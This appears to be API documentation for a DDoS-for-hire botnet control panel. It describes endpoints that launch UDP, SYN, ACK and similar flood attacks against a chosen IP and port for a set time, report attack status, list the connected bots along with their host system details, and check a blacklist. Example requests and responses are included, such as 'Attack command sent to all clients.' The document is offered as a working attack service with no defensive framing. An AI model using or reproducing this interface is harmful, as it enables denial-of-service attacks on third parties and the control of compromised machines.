GET /attack

Launch a DDoS attack against a target

Parameters

Parameter Type Required Description
api string Yes Your API key
ip string Yes Target IP address or domain
port integer Yes Target port (1-65535)
threads integer Yes Number of threads (1-100)
method string Yes Attack method (see below)
duration integer Yes Attack duration in seconds (30-120)

Available Methods

udp
UDP Flood
syn
SYN Flood
ack
ACK Flood
synack
SYN-ACK
udpbypass
UDP Bypass
voult
Voult
std
STD Flood
hex
HEX Flood

Example Request

GET /attack?api=YOUR_API_KEY&ip=1.2.3.4&port=80&threads=10&method=udp&duration=60

Success Response

{
  "message": "Attack command sent to all clients."
}

Error Response

{
  "message": "Invalid API key!"
}
GET /status

Check current attack status

Parameters

Parameter Type Required Description
api string Yes Your API key

Example Request

GET /status?api=YOUR_API_KEY

Response

{
  "active": true,
  "attacks_enabled": true,
  "target": "1.2.3.4",
  "port": 80,
  "method": "udp",
  "threads": 10,
  "remainingTime": "45 seconds",
  "initiatedByIp": "127.0.0.1"
}
GET /users

Get list of connected bots

Parameters

Parameter Type Required Description
api string Yes Your API key

Example Request

GET /users?api=YOUR_API_KEY

Response

{
  "total": 2,
  "clients": [
    {
      "ip": "192.168.1.100",
      "connectedAt": "2026-01-27T15:30:00.000Z",
      "lastActivity": "2026-01-27T15:35:00.000Z",
      "source": "c",
      "systemInfo": {
        "os": "Linux",
        "hostname": "server-01",
        "cpu": "Intel Xeon",
        "memory": { "total": 16777216000, "used": 8388608000, "free": 8388608000 }
      }
    }
  ]
}
GET /blacklist/check

Check if an IP is blacklisted

Parameters

Parameter Type Required Description
api string Yes Your API key
ip string Yes IP address to check

Example Request

GET /blacklist/check?api=YOUR_API_KEY&ip=1.2.3.4

Response

{
  "ip": "1.2.3.4",
  "blacklisted": false
}